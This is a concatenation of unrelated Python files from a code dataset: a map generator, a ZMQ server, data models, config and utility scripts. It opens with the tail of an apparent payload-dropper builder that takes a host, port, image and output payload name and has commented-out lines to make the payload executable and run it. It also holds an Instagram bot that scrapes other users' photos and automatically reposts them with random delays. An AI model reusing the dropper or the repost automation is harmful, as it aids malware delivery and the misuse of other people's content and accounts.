    optp.add_option("-o", "--out", dest="payload",
                    help="Name of the payload to output")
    opts, args = optp.parse_args()
    # Setup logging
    logging.basicConfig(level=opts.loglevel,
                        format='%(levelname)-8s %(message)s')
    # Interactively prompt for anything not given on the command line.
    if opts.host is None:
        opts.host = raw_input("Host: ")
    if opts.port is None:
        opts.port = raw_input("Port: ")
    if opts.image is None:
        opts.image = raw_input("Image path: ")
    if opts.payload is None:
        opts.payload = raw_input("Name of the output file: ")
    drop(opts.host, opts.port, opts.image, opts.payload)
    #set executable
    #os.chmod(opts.payload, 0777 )
    #Launch the executable
    #os.system( './'+payload )
if __name__ == '__main__':
    main()
| StarcoderdataPython |
6587336 | <filename>Project1/mapGenerator.py
import pygame
import time
import random
import os
from datetime import datetime
from os import listdir
from pygame.locals import *
from button import *
from WFC import *
class MapGenerator:
    """Pygame screen that shows 8 WFC-generated map tiles in a 2x4 grid and
    lets the user select tiles (red outline), regenerate, or save them."""
    def __init__(self, game):
        self.game = game
        self.screen = game.screen
        self.images = []  # list of dicts: tile surface, rect, location, selected
        self.button1 = Button((600,550,105,25), 'Regenerate', self.game)
        self.button2 = Button((600,20,105,25), 'Save', self.game)
    def init(self, images):
        """Convert PIL images into scaled pygame surfaces laid out on a grid.

        NOTE(review): assumes exactly len(location) (8) images — more would
        raise IndexError on `location[index]`.
        """
        location = [(10,70), (210,70), (410, 70), (610, 70), (10, 300), (210,300), (410, 300), (610, 300)]
        index = 0
        self.images = []
        for image in images:
            # PIL image -> raw bytes -> pygame surface
            mode = image.mode
            size = image.size
            data = image.tobytes()
            tile = pygame.image.fromstring(data, size, mode)
            tmp = {}
            tmp['tile'] = pygame.transform.scale(tile, (180,180))
            tmp['rect'] = pygame.Rect((location[index][0],location[index][1],180,180))
            tmp['location'] = location[index]
            tmp['selected'] = False
            self.images.append(tmp)
            index += 1
    # def process(self, imagefiles):
    def draw(self):
        """Blit buttons and tiles; outline selected tiles in red."""
        self.button1.draw()
        self.button2.draw()
        for image in self.images:
            self.screen.blit(image['tile'], image['rect'])
            if image['selected'] == True:
                pygame.draw.rect(self.screen, Color('red'), image['rect'], 5)
    def get_event(self, event):
        """Handle left clicks: toggle tile selection, dispatch button actions."""
        if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
            for image in self.images:
                if image['rect'].collidepoint(pygame.mouse.get_pos()):
                    # print(image['name'])
                    image['selected'] = not image['selected']
            if self.button1.rect.collidepoint(pygame.mouse.get_pos()):
                self.button1updata()
            if self.button2.rect.collidepoint(pygame.mouse.get_pos()):
                self.button2updata()
    def button1updata(self):
        # "Regenerate": run Wave Function Collapse 8 times and reload the grid.
        selectedImage = self.game.constrainGenerator.selectedImage
        constraints = self.game.constrainGenerator.constraints
        WFC = WaveFunctionCollaps(selectedImage, constraints)
        res = []
        for i in range(8):
            res.append(WFC.run())
        self.init(res)
    def button2updata(self):
        # "Save": write every selected tile under ./ResultMap, named by
        # timestamp + grid location.  `time` here shadows the time module
        # locally (harmless inside this method).
        for image in self.images:
            if image['selected'] == True:
                time = str(datetime.now())
                name = time + str(image['location'])
                pygame.image.save(image['tile'], f"./ResultMap/{name}.png")
if __name__ == "__main__":
    # Ad-hoc smoke test only; MapGenerator itself is driven by the game loop.
    print('hello')
    datetime = datetime.now()  # NOTE(review): rebinding shadows the imported datetime class
    print(type(str(datetime)))
# mapgenerator = MapGenerator() | StarcoderdataPython |
11296607 | import numpy as np
import cv2 as cv
import base64
import time
import zmq
import IO
# Receive timeout passed to zmq.RCVTIMEO (milliseconds); send_frame also
# compares it against time.time() deltas (seconds) — see note there.
TIMEOUT = 1000
def initialize_socket(port="555"):
    """Create the module-global REP socket and bind it on tcp://*:<port>."""
    global socket  # NOTE(review): shadows any `socket` module import at module scope
    print("[ZMQ SERVER] Socket initializing...", end="")
    context = zmq.Context()
    socket = context.socket(zmq.REP)
    socket.setsockopt(zmq.RCVTIMEO, TIMEOUT)
    socket.bind("tcp://*:{}".format(port))
    print("\tOK")
def encode_image(img):
    """JPEG-encode *img* with OpenCV and return the bytes base64-encoded."""
    success, jpeg_buffer = cv.imencode(".jpg", img)
    # The success flag is not checked, matching the caller's expectations.
    return base64.b64encode(jpeg_buffer)
def null_frame():
    """Return an encoded all-black 480x640x3 placeholder frame."""
    return encode_image(np.zeros((480, 640, 3)))
def send_frame(img):
    """Serve one frame over the module-global REP socket.

    Implements a small resynchronisation protocol: the client is expected to
    send <GET>, receive the JPEG/base64 frame, and acknowledge with <ACK>,
    to which we reply <OK>.  Stray <ACK>/<BOOT>/<GET> messages are handled
    so both sides can recover after a restart.

    Returns True on a completed exchange, None when only a resync step was
    performed, and falls through (implicitly None) on repeated timeouts.

    NOTE(review): TIMEOUT (=1000) is configured in milliseconds for
    zmq.RCVTIMEO but compared here against a seconds delta — confirm the
    intended overall deadline.
    """
    st = time.time()
    while (time.time() - st) < TIMEOUT:
        try:
            request = socket.recv()
            if not request == b"<GET>":
                print("[SYNC FAILURE] Trying to synchronise...", end="")
                if request == b"<ACK>":
                    # Client acknowledged a frame we already forgot about.
                    socket.send(b"<OK>")
                    print("\tFIXED")
                    return None
                elif request == b"<BOOT>":
                    print("FIXING")
                    print("[CONNECTION] Client seems restarted. Resynchronising...")
                    socket.send(b"<BOOT_CONFIRM>")
                    #send_frame(img)
                    return None
                else:
                    print("[BAD REQUEST]", request)
            enc_img = encode_image(img)
            socket.send(enc_img)
            response = socket.recv()
            if not response == b"<ACK>":
                print("[BAD RESPONSE] Trying to fix...", end="")
                if response == b"<BOOT>":
                    socket.send(b"<BOOT_CONFIRM>")
                    print("\tFIXED")
                    return None
                elif response == b"<GET>":
                    print("\tNull sending")
                    socket.send(null_frame())
                    res = socket.recv()
                    if not res == b"<ACK>": print("[FUCK] It's screwed up.")
                    # BUG FIX: was `socket.recv(b"<OK>")` — recv takes integer
                    # flags (TypeError), and a REP socket must *send* after a
                    # recv to keep the request/reply state machine valid.
                    socket.send(b"<OK>")
                    return None
                else:
                    print("[BAD RESPONSE]", response)
                    return None
            socket.send(b"<OK>")
            return True
        except zmq.error.Again:
            # zmq.RCVTIMEO expired with nothing to read; keep retrying
            # until the outer deadline elapses.
            print("[CONNECTION] Connection lost.")
            print("[TIMEOUT] Unable to reach client.")
| StarcoderdataPython |
11383208 | from dataclasses import dataclass
from typing import List, Optional, Any
@dataclass
class LoginFormData:
    """Opaque numeric identifiers required by the school-diary login form."""
    CID: int
    SID: int
    PID: int
    CN: int
    SFT: int
    SCID: int
@dataclass
class Mark:
    """A grade for one assignment; `mark` is None when not yet graded."""
    assignmentId: int
    studentId: int
    mark: Optional[int]
    dutyMark: bool
@dataclass
class SubjectGroup:
    """A subject/class group (e.g. one course section)."""
    id: int
    name: str
@dataclass
class User:
    """A diary user (full name plus login nickname)."""
    id: int
    fio: str
    nickName: str
@dataclass
class Teacher:
    """A teacher reference attached to assignments."""
    id: int
    name: str
@dataclass
class Attachment:
    """A file attached to an assignment or announcement."""
    id: int
    name: Optional[str]
    originalFileName: str
    description: Optional[str]
@dataclass
class LessonAttachments:
    """Attachments and (student) answer files for one assignment."""
    assignmentId: int
    attachments: List[Attachment]
    answerFiles: List[Any]
@dataclass
class AssignmentInfo:
    """Full detail view of a single assignment."""
    id: int
    assignmentName: str
    activityName: Optional[str]
    problemName: Optional[str]
    subjectGroup: SubjectGroup
    teacher: Teacher
    productId: Optional[int]
    isDeleted: bool
    weight: int
    date: str
    description: str
    attachments: List[Attachment]
@dataclass
class Assignment:
    """Assignment summary as embedded in a lesson; typeId maps into ASSIGNMENT_TYPES."""
    mark: Optional[Mark]
    id: int
    typeId: int
    assignmentName: str
    dueDate: str
    weight: int
@dataclass
class Lesson:
    """One timetable slot; optional fields are absent for free periods."""
    classmeetingId: int
    day: str
    number: int
    room: Optional[str]
    relay: int
    startTime: Optional[str]
    endTime: Optional[str]
    subjectName: Optional[str]
    assignments: Optional[List[Assignment]]
@dataclass
class Day:
    """All lessons of one calendar day."""
    date: str
    lessons: List[Lesson]
@dataclass
class Diary:
    """One week of the diary for a given class and term."""
    weekStart: str
    weekEnd: str
    weekDays: List[Day]
    termName: str
    className: str
@dataclass
class Announcement:
    """A school-wide or targeted announcement post."""
    description: str
    postDate: str
    deleteDate: Optional[str]
    author: User
    attachments: List[Attachment]
    id: int
    name: str
    recipientInfo: Optional[str]
# Maps Assignment.typeId to its human-readable (Russian) label.
# Note the gaps (15, 19-20, 28, 30): those ids are not used by the service.
ASSIGNMENT_TYPES = {
    1: "Практическая работа",
    2: "Тематическая работа",
    3: "Домашнее задание",
    4: "Контрольная работа",
    5: "Самостоятельная работа",
    6: "Лабораторная работа",
    7: "Проект",
    8: "Диктант",
    9: "Реферат",
    10: "Ответ на уроке",
    11: "Сочинение",
    12: "Изложение",
    13: "Зачёт",
    14: "Тестирование",
    16: "Диагностическая контрольная работа",
    17: "Диагностическая работа",
    18: "Контрольное списывание",
    21: "Работа на уроке",
    22: "Работа в тетради",
    23: "Ведение рабочей тетради",
    24: "Доклад/Презентация",
    25: "Проверочная работа",
    26: "Чтение наизусть",
    27: "Пересказ текста",
    29: "Предметный диктант",
    31: "Дифференцированный зачет",
    32: "Работа с картами",
    33: "Экзамен",
    34: "Изложение с элементами сочинения",
    35: "Контроль аудирования",
    36: "Контроль грамматики",
    37: "Контроль лексеки",
    38: "Устный развернутый ответ",
}
| StarcoderdataPython |
1612115 | import os
from django.conf import settings
from django.core.asgi import get_asgi_application
# Django must be configured and initialised before channels/chat imports below.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'src.settings')
django_asgi_app = get_asgi_application()
"""Imports only after get_asgi_application() and env.
Excluded error like:
django.core.exceptions.AppRegistryNotReady: Apps aren't loaded yet.
"""
from channels.routing import ProtocolTypeRouter, URLRouter
from channels.security.websocket import OriginValidator
from sentry_sdk.integrations.asgi import SentryAsgiMiddleware
from chat.middleware import AuthMiddlewareStack
from chat.routing import websocket_urlpatterns as chat_urlpatterns
# NOTE(review): OriginValidator is imported but never used — confirm whether
# websocket origin validation was intended here.
# Route HTTP to Django and websockets to the authenticated chat URL router;
# the whole ASGI app is wrapped for Sentry error reporting.
application = SentryAsgiMiddleware(
    ProtocolTypeRouter(
        {
            "http": django_asgi_app,
            'websocket': AuthMiddlewareStack(
                URLRouter(
                    chat_urlpatterns,
                )
            ),
        }
    )
)
| StarcoderdataPython |
1898966 | #! /usr/bin/python3
"""
InstabotAI - Instagram Bot With Face Detection
Intro:
This bot autoscrape users from variable output -l
if a face is detected it will repost, repost to
stories, send DM to users, like and comment that
photo. If no face is detected in image it will
scrape the next profile in list.
Github:
https://github.com/instagrambot/instabotai
Workflow:
Repost best photos from users to your account
By default bot checks username_database.txt
The file should contain one username per line!
"""
import face_recognition
import instagram_scraper as insta
from instabot import Bot, utils
import argparse
import os
import sys
import json
import time
from tqdm import tqdm
import logging
from random import randint
# Config
image_comment = "Wow nice picture, i have just reposted it"
# Logging Output default settings
logging.basicConfig(stream=sys.stdout, format='',
                    level=logging.INFO, datefmt=None)
log = logging.getLogger(__name__)
# Parse arguments from Cli into variables
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-u', type=str, help="username")
parser.add_argument('-p', type=str, help="password")
parser.add_argument('-l', type=str, help="therock,kimkardashian")
parser.add_argument('-t', type=str, help="#hotgirls,#models,#like4like")
parser.add_argument('-proxy', type=str, help="proxy")
parser.add_argument('-file', type=str, help="users filename")
parser.add_argument('-amount', type=int, help="amount", default=1)
parser.add_argument('users', type=str, nargs='*', help='users')
args = parser.parse_args()
InstaUsername = args.u
## Seperate users into list file
def help_output():
    # Print usage and exit when no username was supplied on the CLI.
    if not args.u:
        log.info('python3 example.py -u for username -p password -l therock,kimkardashian -t "#like4like#follow4follow"')
        sys.exit()
help_output()
userlist = args.l
instagramtags = args.t
# Write the comma-separated -l profiles one per line for later scraping.
# NOTE(review): crashes with AttributeError if -l was omitted (userlist is None).
with open('instaprofiles.txt', 'w') as f:
    if f:
        userlist = userlist.replace(",", "\n")
        f.write(userlist)
username = InstaUsername
# Open Userdb and put them into a list also write your username to database
def open_profiles():
    """Load the profiles file into the global `insta_profiles` list and
    mirror it to userdb.txt; also record our own username."""
    # Profiles to scrape and repost
    global insta_profiles
    insta_profiles = []
    with open("instaprofiles.txt") as f:
        insta_profiles = f.read().splitlines()
        f.close()  # NOTE(review): redundant — the with-block already closes f
    # Output userenames in a txt file
    global userdb
    userdb = '\n'.join(insta_profiles)+'\n'
    with open('userdb.txt', 'w') as f:
        f.write(userdb)
    global username
    time.sleep(1)
    with open('username_database.txt', 'w') as f:
        f.write(username)
# How many recent posts to scrape per profile.
number_last_photos = 3
# Index of the profile currently being processed (shared global).
x = 0
sys.path.append(os.path.join(sys.path[0], '../'))
USERNAME_DATABASE = 'username_database.txt'
POSTED_MEDIAS = 'posted_medias.txt'
def repost_best_photos(bot, users, amount=1):
    """Repost the `amount` best (most liked/commented) unused photos of `users`."""
    medias = get_not_used_medias_from_users(bot, users)
    medias = sort_best_medias(bot, medias, amount)
    for media in tqdm(medias, desc='Reposting photos'):
        repost_photo(bot, media)
# Sort best media this is not executed yet
def sort_best_medias(bot, media_ids, amount=1):
    """Return the top-`amount` media pks ranked by (likes, comments) desc."""
    best_medias = [bot.get_media_info(media)[0] for media in
                   tqdm(media_ids, desc='Getting media info')]
    best_medias = sorted(best_medias, key=lambda x:
                         (x['like_count'], x['comment_count']), reverse=True)
    return [best_media['pk'] for best_media in best_medias[:amount]]
def get_not_used_medias_from_users(bot, users=None,
                                   users_path=USERNAME_DATABASE):
    """Collect media ids of `users` (or of users listed in `users_path`)
    that have not been reposted yet (per POSTED_MEDIAS)."""
    if not users:
        users = utils.file(users_path).list
    users = map(str, users)
    total_medias = []
    for user in users:
        medias = bot.get_user_medias(user, filtration=False)
        medias = [media for media in medias if not
                  exists_in_posted_medias(media)]
        total_medias.extend(medias)
    return total_medias
def exists_in_posted_medias(new_media_id, path=POSTED_MEDIAS):
    """True if `new_media_id` is already recorded in the posted-medias file."""
    medias = utils.file(path).list
    return str(new_media_id) in medias
def update_posted_medias(new_media_id, path=POSTED_MEDIAS):
    """Append `new_media_id` to the posted-medias file; always returns True."""
    medias = utils.file(path)
    medias.append(str(new_media_id))
    return True
def repost_photo(bot, new_media_id, path=POSTED_MEDIAS):
    """Upload the globally prepared photo and record `new_media_id` as posted.

    NOTE(review): uploads the module globals `instapath`/`tags` set by
    instascraper(), not anything derived from `new_media_id` — confirm intent.
    """
    if bot.upload_photo(instapath, tags):
        update_posted_medias(new_media_id, path)
        logging.info('Media_id {0} is saved in {1}'
                     .format(new_media_id, path))
# Instagram image scraper
def InstaImageScraper():
    """Scrape the latest `number_last_photos` images (plus JSON metadata) of
    the profile at index `x` into a directory named after the profile."""
    imgScraper = insta.InstagramScraper(usernames=[insta_profiles[x]],
                                        maximum=number_last_photos,
                                        media_metadata=True, latest=True,
                                        media_types=['image'])
    imgScraper.scrape()
    print("image scraping is running, please wait 50 seconds.")
# Instagram manipulate image and repost them
# While x is less than instaprofiles loop this
def instascraper(bot, new_media_id, path=POSTED_MEDIAS):
    """Main scrape/detect/repost loop over `insta_profiles`.

    For the profile at global index `x`: scrape its latest posts, read the
    first image from the scraper's JSON, run face detection, and — if a face
    is found and the image was not posted before — repost it, post it to the
    story, and log stats to <username>.tsv / <username>_posted.tsv.

    NOTE(review): several structural hazards left as-is:
    - recursion is used instead of loop continuation (both to advance to the
      next profile and to restart at the end), so long runs can exhaust the
      recursion limit;
    - bare `except:` clauses swallow every error (including KeyboardInterrupt);
    - state flows through module globals (x, scraped_user, instapath, tags,
      username, saveStats, user_id).
    """
    InstaImageScraper()
    time.sleep(randint(1, 5))
    global x
    while x < len(insta_profiles):
        try:
            # Open insta_profiles[x] and it's scraped
            # json file take first image location
            with open(insta_profiles[x]
                      + '/' + insta_profiles[x] + '.json', 'r') as j:
                global scraped_user
                scraped_user = insta_profiles[x]
                json_data = json.load(j)
                time.sleep(randint(1, 10))
                newstr = (json_data["GraphImages"][0]["display_url"])
                # Output media id of image
                media_id = (json_data["GraphImages"][0]["id"])
                log.info("Found media id: " + media_id)
                time.sleep(randint(5, 10))
                logging.info("image string generated " + newstr)
                time.sleep(randint(1, 5))
                # Local file name = last URL path segment without query string.
                imgUrl = newstr.split('?')[0].split('/')[-1]
                global instapath
                instapath = insta_profiles[x] + '/' + imgUrl
                logging.info("Found Instagram Path to Image: " + instapath)
                time.sleep(randint(1, 5))
                global tags
                tags = f'''@{insta_profiles[x]} {instagramtags}'''
                # Execute Face Detection
                # Locate Face On image scraped
                image = face_recognition.load_image_file(instapath)
                face_locations = face_recognition.face_locations(image)
                # If no face located scrape the next profile
                if not face_locations:
                    log.info("There is no Face Detected scraping next profile")
                    x += 1
                    log.info(scraped_user)
                    time.sleep(randint(5, 10))
                    instascraper(bot, new_media_id, path=POSTED_MEDIAS)
                else:
                    log.info("There is a Face Detected scraping and posting this image")
                    log.info(scraped_user)
                    time.sleep(randint(5, 10))
                    log.info("Media Id:" + str(media_id))
                    log.info("Face Location: " + str(face_locations))
                    log.info("Path to image: " + instapath)
                    # Append username info to csv file
                    try:
                        with open(f'{username}.tsv', 'a+') as f:
                            f.write(str(saveStats))
                        with open(f'{username}.tsv', 'r') as f:
                            last_line = f.readlines()[-2].replace("False", "")
                        log.info("Date - Time - Followers - Following - Posts")
                        log.info(last_line)
                    # Write username tsv file if it does not exist
                    except:
                        with open(f'{username}.tsv', 'w+') as f:
                            f.write(str(saveStats))
                        with open(f'{username}.tsv', 'r') as f:
                            last_line = f.readlines()[-1]
                        log.info("Date - Time - Followers - Following - Posts")
                        log.info(last_line)
                    # Append username info to csv file
                    try:
                        with open(f'{username}_posted.tsv', 'a+') as f:
                            f.write(str(imgUrl + "\n"))
                        with open(f'{username}_posted.tsv', 'r') as f:
                            last_line = f.readlines()[-1]
                        with open(f'{username}_posted.tsv', 'r') as f:
                            all_lines = f.readlines()[0:-2]
                            all_lines = (str(all_lines))
                        log.info("Posted Media")
                        log.info(last_line)
                        # if imgurl is in file username_posted scrape next profile
                        if str(imgUrl) in str(all_lines):
                            try:
                                log.info("Image found in database scraping next profile")
                                x += 1
                                log.info("image found of: " + scraped_user)
                                time.sleep(randint(5, 10))
                                instascraper(bot, new_media_id, path=POSTED_MEDIAS)
                            except:
                                log.info("image found of: " + scraped_user)
                                x += 1
                                time.sleep(randint(5, 20))
                                instascraper(bot, new_media_id, path=POSTED_MEDIAS)
                    # Write username tsv file if it does not exist
                    except:
                        with open(f'{username}_posted.tsv', 'a+') as f:
                            f.write(str(imgUrl + "\n"))
                        with open(f'{username}_posted.tsv', 'r') as f:
                            last_line = str(f.readlines()[-1])
                            all_lines = str(f.readlines()[0:-2])
                        log.info("Posted media")
                        logging(last_line)
                        if imgUrl in all_lines:
                            log.info("Image found in database scraping next profile")
                            x += 1
                            log.info("image of " + scraped_user)
                            time.sleep(randint(5, 20))
                            instascraper(bot, new_media_id, path=POSTED_MEDIAS)
                    # Execute the repost function
                    time.sleep(randint(20, 40))
                    # Repost image as story
                    time.sleep(randint(20, 50))
                    bot.upload_story_photo(instapath)
                    log.info("Photo Uploaded to Story")
                    # Send private DM to user it reposted
                    # bot.send_messages("Hi i just reposted your photo", user_id)
                    time.sleep(randint(20, 60))
                    print(user_id)
                    # os.remove("posted_medias.txt")
                    log.info("Wait 2200 - 2600 sec for next repost")
                    time.sleep(randint(2200, 2800))
        except:
            # Any failure (private profile, missing JSON, network...) skips
            # to the next profile via recursion.
            log.info("image set to private " + scraped_user)
            x += 1
            time.sleep(randint(5, 20))
            instascraper(bot, new_media_id, path=POSTED_MEDIAS)
        x += 1
    # All profiles done: reset the index and start the cycle again.
    x = 0
    time.sleep(randint(10, 30))
    instascraper(bot, new_media_id, path=POSTED_MEDIAS)
# All main stuff gets executed
open_profiles()
time.sleep(randint(5, 30))
bot = Bot()
#bot.login(username=InstaUsername)
bot.login(username=args.u, password=args.p)
time.sleep(randint(10, 30))
user_id = bot.get_user_id_from_username(args.u)
username = bot.get_username_from_user_id(user_id)
#print(f"Welcome {username} your userid is {user_id}")
saveStats = bot.save_user_stats(username)
users = None
# Positional CLI users win over a -file user list.
if args.users:
    users = args.users
elif args.file:
    users = utils.file(args.file).list
# NOTE(review): instascraper(bot, new_media_id, path=...) is called here with
# (bot, users, args.amount) — the arguments do not match its parameter names;
# confirm whether repost_best_photos was intended instead.
instascraper(bot, users, args.amount)
| StarcoderdataPython |
9793843 | <filename>cifar10/models/__init__.py
from .wideresnet import *
from .resnet import *
from .dpn import *
from .se_resnet import *
from .se_resnext import *
from .pre_resnet import *
from .resnext import *
from .resnext_101_32x4d import *
from .resnext_50_32x4d import *
from .resnext_101_64x4d import *
from .wrn_50_2f import *
from .nasnet import *
from .inceptionresnetv2 import *
from .inceptionv4 import *
| StarcoderdataPython |
215226 | <gh_stars>10-100
import pandas as pd
from pyam import IamDataFrame
def get_netzero_data(df, meta, default_year):
    """Reformat an IamDataFrame selecting the year via a meta column

    For each (model, scenario), read the target year from the meta column
    `meta`, falling back to `default_year` when it cannot be cast to int
    (e.g. NaN raises ValueError), interpolate the timeseries to that year,
    and keep only that year's data.  All years are then relabelled to 0 so
    scenarios with different net-zero years line up on one axis.
    """
    lst = []
    # iterate over scenarios and retrieve timeseries data for the year given by `meta`
    for model, scenario in df.index:
        try:
            y = int(df.meta.loc[(model, scenario), meta])
        except ValueError:
            y = default_year
        _df = df.filter(model=model, scenario=scenario)
        _df.interpolate(y, inplace=True)
        # NOTE(review): relies on the private `_data` attribute of pyam —
        # may break across pyam versions.
        lst.append(_df.filter(year=y)._data)
    # concatenate single-year timeseries data and cast to IamDataFrame
    data = pd.concat(lst).reset_index()
    data.year = 0
return IamDataFrame(data) | StarcoderdataPython |
4932395 | <reponame>private-yusuke/Competitive-Programming
# Three integers, exactly two of which are expected to be equal;
# print the odd one out (the trailing else covers the A == C case).
A, B, C = (int(token) for token in input().split())
if A == B:
    print(C)
elif B == C:
    print(A)
else: print(B) | StarcoderdataPython |
4966548 | import itertools
from microbenchmarks._metric import MetricType
from microbenchmarks._utils import get_ti_arch, tags2name
import taichi as ti
class Funcs():
    """Registry mapping benchmark tag lists to their implementation functions."""
    def __init__(self):
        self._funcs = {}

    def add_func(self, tag_list: list, func):
        """Register *func* under the case name derived from *tag_list*."""
        entry = {'tags': tag_list, 'func': func}
        self._funcs[tags2name(tag_list)] = entry

    def get_func(self, tags):
        """Return the first registered func whose tag set is contained in *tags*,
        or None when no registration matches."""
        for entry in self._funcs.values():
            if set(entry['tags']).issubset(tags):
                return entry['func']
        return None
class BenchmarkPlan:
    """Builds the cartesian product of benchmark item tags into named cases
    and runs the matching function for each case under Taichi."""
    def __init__(self, name='plan', arch='x64', basic_repeat_times=1):
        self.name = name
        self.arch = arch
        self.basic_repeat_times = basic_repeat_times
        self.info = {'name': self.name}
        self.plan = {} # {'tags': [...], 'result': None}
        self.items = []
        self.funcs = Funcs()
    def create_plan(self, *items):
        """Expand the given items' tags into one plan entry per combination."""
        self.items = list(items)
        items_list = [[self.name]]
        for item in self.items:
            items_list.append(item.get_tags())
            self.info[item.name] = item.get_tags()
        case_list = list(itertools.product(*items_list)) #items generate cases
        for tags in case_list:
            self.plan[tags2name(tags)] = {'tags': tags, 'result': None}
    def add_func(self, tag_list, func):
        # Delegate registration to the Funcs registry.
        self.funcs.add_func(tag_list, func)
    def run(self):
        """Execute every planned case and return {'results': ..., 'info': ...}."""
        for case, plan in self.plan.items():
            tag_list = plan['tags']
            MetricType.init_taichi(self.arch, tag_list)
            # NOTE(review): get_func may return None for an unmatched tag set,
            # which would raise TypeError here.
            _ms = self.funcs.get_func(tag_list)(self.arch,
                                                self.basic_repeat_times,
                                                **self._get_kwargs(tag_list))
            plan['result'] = _ms
            print(f'{tag_list}={_ms}')
            ti.reset()
        rdict = {'results': self.plan, 'info': self.info}
        return rdict
    def _get_kwargs(self, tags):
        """Map each item's tag (positionally aligned with self.items) to its impl."""
        kwargs = {}
        tags = tags[1:] # tags = [case_name, item1_tag, item2_tag, ...]
        for item, tag in zip(self.items, tags):
            kwargs[item.name] = item.impl(tag)
        return kwargs
| StarcoderdataPython |
4997182 | from monitor.watcher import Watcher
import time
try:
import configparser
except ImportError:
import ConfigParser as configparser
def multi_watch(args):
    """Start one Watcher generator per section of conf/monitor.conf and
    advance them all forever, once per second.

    Each section must define 'path' and 'action'; 'excludes' is an optional
    '|'-separated list.  `args` is accepted but unused here.
    """
    gens = []
    config = configparser.ConfigParser()
    config.read('conf/monitor.conf')
    for name in config.sections():
        print('-----[%s]-----' % name)
        watch_dict = {}
        for key, value in config[name].items():
            print("%s: %s" % (key, value))
            watch_dict[key] = value
        excludes = watch_dict['excludes'].split('|') if watch_dict.get('excludes') else None
        gen = Watcher(watch_dict['path'], excludes=excludes, project=name).auto_reload(watch_dict['action'])
        gens.append(gen)
    # Round-robin drive every watcher generator; never returns.
    while True:
        for g in gens:
            next(g)
        time.sleep(1)
| StarcoderdataPython |
5170123 | <filename>api/staff/migrations/0007_auto_20211219_2259.py
# Generated by Django 3.2.10 on 2021-12-19 22:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Rename Rank.name to Rank.title and attach Rank to Department.

    The new ForeignKey defaults to department pk 1 only to back-fill existing
    rows (preserve_default=False drops the default afterwards).
    """
    dependencies = [
        ('staff', '0006_auto_20211218_2005'),
    ]
    operations = [
        migrations.RenameField(
            model_name='rank',
            old_name='name',
            new_name='title',
        ),
        migrations.AddField(
            model_name='rank',
            name='department',
            field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='ranks', to='staff.department'),
            preserve_default=False,
        ),
    ]
| StarcoderdataPython |
99594 | from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.view import view_config
import pyramid.httpexceptions as exc
import re
from pyramid.request import Request
from _pybgpstream import BGPStream, BGPRecord, BGPElem
from datetime import time, timedelta
import json
#@view_config(renderer='json')
def data(request):
    """Pyramid view for /peers/: read collector/timespan query parameters and
    prepare a BGPStream over the collector's sqlite dump.

    The route is registered with renderer='json', so returning a plain dict
    produces a JSON response.
    """
    # BUG FIX: removed leftover `import pdb; pdb.set_trace()` (it froze the
    # server on every request) and replaced `collector, start, end = 0`,
    # which raised TypeError (an int cannot be unpacked into three names).
    collector = ""
    start = 0
    end = 0
    # BUG FIX: dict.has_key() is Python 2 only; `in` works on both.
    if "route_collector" in request.GET:
        collector = request.GET["route_collector"]
    if "timespan_start" in request.GET:
        start = request.GET["timespan_start"]
    if "timespan_end" in request.GET:
        end = request.GET["timespan_end"]
    # create a new bgpstream instance
    stream = BGPStream()
    # select the data source
    # on the CLI it works this way $ bgpreader -d sqlite -o db-file,ULG.sqlite -w 1477000000,1777360000
    stream.set_data_interface("sqlite")
    print("collector from URL is: " + collector)
    # FIXME Use the collector name
    stream.set_data_interface_option('db-file', collector + '.sqlite')
    # create a reusable bgprecord instance
    rec = BGPRecord()
    # TODO: when start/end are provided, add an interval filter to the stream
    # and emit the records; until then echo the parsed parameters back.
    # BUG FIX: the original `return response` referenced an undefined name.
    return {"route_collector": collector,
            "timespan_start": start,
            "timespan_end": end}
if __name__ == '__main__':
    # Wire the single /peers/ route to the `data` view and serve it with the
    # stdlib reference WSGI server (development use only, binds all interfaces).
    config = Configurator()
    config.add_route('bgpread', '/peers/')
    config.add_view(data, route_name='bgpread', renderer='json')
    app = config.make_wsgi_app()
    server = make_server('0.0.0.0', 8080, app)
    server.serve_forever()
| StarcoderdataPython |
11310073 | <gh_stars>1-10
"""GitHub organization model."""
from .user import GitHubBaseUserModel
class GitHubOrganizationModel(GitHubBaseUserModel):
    """GitHub organization model.

    Behaviour is inherited unchanged from GitHubBaseUserModel; the subclass
    exists to give organizations a distinct type.
    """
| StarcoderdataPython |
166061 | <gh_stars>1-10
from w3lib.http import basic_auth_header
from scrapy.utils.project import get_project_settings
class ProxyMiddleware(object):
    """Scrapy downloader middleware that routes every request through the
    proxy configured in project settings (PROXY_HOST/PORT/USER/PASSWORD)."""
    def process_request(self, request, spider):
        # Re-reads settings per request; host/port are concatenated as strings.
        settings = get_project_settings()
        request.meta['proxy'] = settings.get('PROXY_HOST') + ':' + settings.get('PROXY_PORT')
        request.headers["Proxy-Authorization"] = basic_auth_header(settings.get('PROXY_USER'), settings.get('PROXY_PASSWORD'))
        spider.log('Proxy : %s' % request.meta['proxy'])
| StarcoderdataPython |
1792434 | import sys
# sys.stdin = open("in.txt", 'r')
# For each of t test cases, print the line's characters sorted in
# descending order.
case_count = int(input())
for _ in range(case_count):
    line = input()
    print("".join(sorted(line, reverse=True)))
| StarcoderdataPython |
345667 | <filename>setup.py
from setuptools import setup, find_packages
# Packaging metadata for the data_flow distribution (package dir: dataflow/).
setup(
    name="data_flow",
    version="0.3",
    description="A system transform data consistently and easily",
    packages=["dataflow"],
    url='https://github.com/LordFeratum/DataFlow',
    download_url='https://github.com/LordFeratum/DataFlow/archive/0.3.tar.gz',
    author="<NAME>",
    author_email="<EMAIL>"
)
| StarcoderdataPython |
# Package metadata; __version__ is surfaced by the --version flag below.
__version__ = "0.1"
__author__ = "Julin"
import argparse
from pextn import pextn, UnknownExtension
# CLI entry point: look up one file extension and print what it is.
parser = argparse.ArgumentParser(
    prog="pextn",
    formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    description="A simple, lazy utility to display information about a file extension"
)
parser.add_argument(
    '--version',
    action='version',
    version='%(prog)s ' + __version__
)
parser.add_argument("extension", help="Extension")
args = parser.parse_args()
try:
    # pextn() returns a list of [description, used_by] pairs for the extension.
    extn_info_lists = pextn(args.extension)
